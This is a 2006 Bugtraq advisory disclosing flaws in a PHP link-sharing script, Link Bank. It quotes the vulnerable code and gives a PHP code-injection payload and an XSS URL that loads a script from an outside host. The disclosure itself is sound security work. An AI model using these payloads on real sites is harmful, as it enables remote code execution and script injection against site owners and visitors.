Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

link bank code execution and xss

From: retard () 30gigs com
Date: 6 Mar 2006 23:52:13 -0000
——– summary
        software: Link Bank
        vendors website: http://daverave.64digits.com/index.php?page=linkbank
        versions: n/a
        class: remote
        status: unpatched
        exploit: available
        solution: not available
        discovered by: retard
        risk level: high

——– description
        Link Bank does not sanatise post sumbited to it allowing users to
        insert data that can be used malisiously. after it is submited the 
        data goes to a .txt file witch the application reads and executes
        to display the links submited. along with this it is vulnerable
        to xss due to the application not sanatising the variable again.
        
        in ./content/index.txt:
14      <?php
15      include("links.txt");
16      ?>
        
        in ./content/add_link.txt:
2       $url_name = $_REQUEST['url_name'];
3       $url = $_REQUEST['url'];
4       $img = $_REQUEST['img'];
5       $filename = "content/links.txt";
6       $code = "<a href = iframe.php?site=$url target=_blank>$url_name</a><br>";

        in ./iframe.php:
3       <title>Link Bank - <?php echo"$site";?></title>

——– exploit(s)
        code execution:
        submit something like <?php exec($cmd) ?> as a link name

        xss:
        
http://example.com/iframe.php?site=%3C/title%3E%3C/head%3E%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E

——– credit
        author(s): retard
        email: retard () 30gigs com
Previous By Date Next
Previous By Thread Next

Current thread: